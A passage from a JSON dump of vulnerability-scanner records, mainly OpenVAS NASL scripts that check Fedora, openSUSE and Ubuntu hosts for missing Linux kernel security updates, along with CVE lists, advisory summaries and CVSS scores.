rpm:\"kernel-obs-qa~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.4.90~18.32.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.4.90~18.32.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.4.90~18.32.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-09T19:31:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2020-06-08T00:00:00", "published": "2017-09-18T00:00:00", "id": "OPENVAS:1361412562310873383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873383", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-7369ea045c", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2017-7369ea045c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873383\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-18 07:35:30 +0200 (Mon, 18 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-7369ea045c\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-7369ea045c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/POCXAJOXOL6EYLO5PB4L2ENCPQ3V7RCZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.12.13~300.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T19:30:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2020-06-08T00:00:00", "published": "2017-09-28T00:00:00", "id": "OPENVAS:1361412562310873452", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873452", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-e07d7fb18e", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2017-e07d7fb18e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873452\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-28 09:15:53 +0200 (Thu, 28 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-e07d7fb18e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-e07d7fb18e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OXUDSKTQCMRM4NNOUPVKYWI52ARTFLEF\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.12.13~200.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843354", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843354", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3469-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3469_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3469-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843354\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:02:28 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12192\", \"CVE-2017-14051\",\n \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\",\n \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3469-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3469-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Anthony Perard discovered that the Xen virtual block driver\n did not properly initialize some data structures before passing them to user\n space. A local attacker in a guest VM could use this to expose sensitive\n information from the host OS or other guest VMs. (CVE-2017-10911) Bo Zhang\n discovered that the netlink wireless configuration interface in the Linux kernel\n did not properly validate attributes when handling certain requests. A local\n attacker with the CAP_NET_ADMIN could use this to cause a denial of service\n (system crash). (CVE-2017-12153) It was discovered that the nested KVM\n implementation in the Linux kernel in some situations did not properly prevent\n second level guests from reading and writing the hardware CR8 register. A local\n attacker in a guest could use this to cause a denial of service (system crash).\n It was discovered that the key management subsystem in the Linux kernel did not\n properly restrict key reads on negatively instantiated keys. A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-12192) It\n was discovered that an integer overflow existed in the sysfs interface for the\n QLogic 24xx+ series SCSI driver in the Linux kernel. A local privileged attacker\n could use this to cause a denial of service (system crash). (CVE-2017-14051) It\n was discovered that the ATI Radeon framebuffer driver in the Linux kernel did\n not properly initialize a data structure returned to user space. A local\n attacker could use this to expose sensitive information (kernel memory).\n (CVE-2017-14156) Dave Chinner discovered that the XFS filesystem did not enforce\n that the realtime inode flag was settable only on filesystems on a realtime\n device. A local attacker could use this to cause a denial of service (system\n crash). (CVE-2017-14340) ChunYu Wang discovered that the iSCSI transport\n implementation in the Linux kernel did not properly validate data structures. A\n local attacker could use this to cause a denial of service (system crash).\n (CVE-2017-14489) It was discovered that the generic SCSI driver in the Linux\n kernel did not properly initialize data returned to user space in some\n situations. A local attacker could use this to expose sensitive information\n (kernel memory). (CVE-2017-14991) Dmitry Vyukov discovered that the Floating\n Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts\n to set reserved bits in a tas ... Description truncated, for more information\n please check the Reference URL\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3469-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3469-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic-lpae\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-lowlatency\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-e500mc\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-smp\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-emb\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-smp\", ver:\"4.4.0-98.121~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.98.82\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-01T00:00:00", "id": "OPENVAS:1361412562310843358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843358", "type": "openvas", "title": "Ubuntu Update for linux USN-3469-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3469_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3469-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843358\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-01 05:04:22 +0100 (Wed, 01 Nov 2017)\");\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12192\", \"CVE-2017-14051\",\n \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\",\n \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\", \"CVE-2017-12154\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3469-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Anthony Perard discovered that the Xen\n virtual block driver did not properly initialize some data structures before\n passing them to user space. A local attacker in a guest VM could use this to\n expose sensitive information from the host OS or other guest VMs.\n (CVE-2017-10911) Bo Zhang discovered that the netlink wireless configuration\n interface in the Linux kernel did not properly validate attributes when handling\n certain requests. A local attacker with the CAP_NET_ADMIN could use this to\n cause a denial of service (system crash). (CVE-2017-12153) It was discovered\n that the nested KVM implementation in the Linux kernel in some situations did\n not properly prevent second level guests from reading and writing the hardware\n CR8 register. A local attacker in a guest could use this to cause a denial of\n service (system crash). It was discovered that the key management subsystem in\n the Linux kernel did not properly restrict key reads on negatively instantiated\n keys. A local attacker could use this to cause a denial of service (system\n crash). (CVE-2017-12192) It was discovered that an integer overflow existed in\n the sysfs interface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\n A local privileged attacker could use this to cause a denial of service (system\n crash). (CVE-2017-14051) It was discovered that the ATI Radeon framebuffer\n driver in the Linux kernel did not properly initialize a data structure returned\n to user space. A local attacker could use this to expose sensitive information\n (kernel memory). (CVE-2017-14156) Dave Chinner discovered that the XFS\n filesystem did not enforce that the realtime inode flag was settable only on\n filesystems on a realtime device. A local attacker could use this to cause a\n denial of service (system crash). (CVE-2017-14340) ChunYu Wang discovered that\n the iSCSI transport implementation in the Linux kernel did not properly validate\n data structures. A local attacker could use this to cause a denial of service\n (system crash). (CVE-2017-14489) It was discovered that the generic SCSI driver\n in the Linux kernel did not properly initialize data returned to user space in\n some situations. A local attacker could use this to expose sensitive information\n (kernel memory). (CVE-2017-14991) Dmitry Vyukov discovered that the Floating\n Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts\n to set reserved bits in a task's extended state (xstate) area. A local attacker\n could use this to cause a denial of service (system crash). (CVE-2017-15537)\n Pengfei Wang discovered that the Turtle Beach MultiSound audio device driver in\n the Linux kernel contained race conditions when fetching from the ring-buffer. A\n local attacker could use this to cause a denial of service (infinite loop).\n (CVE-2017-9984, CVE-2017-9985)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3469-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3469-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1009-kvm\", ver:\"4.4.0-1009.14\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1033-gke\", ver:\"4.4.0-1033.33\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1039-aws\", ver:\"4.4.0-1039.48\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1076-raspi2\", ver:\"4.4.0-1076.84\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1078-snapdragon\", ver:\"4.4.0-1078.83\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic-lpae\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-lowlatency\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-e500mc\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-smp\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-emb\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-smp\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1039.41\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.4.0.1033.34\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1009.9\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1076.76\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1078.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T19:22:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", 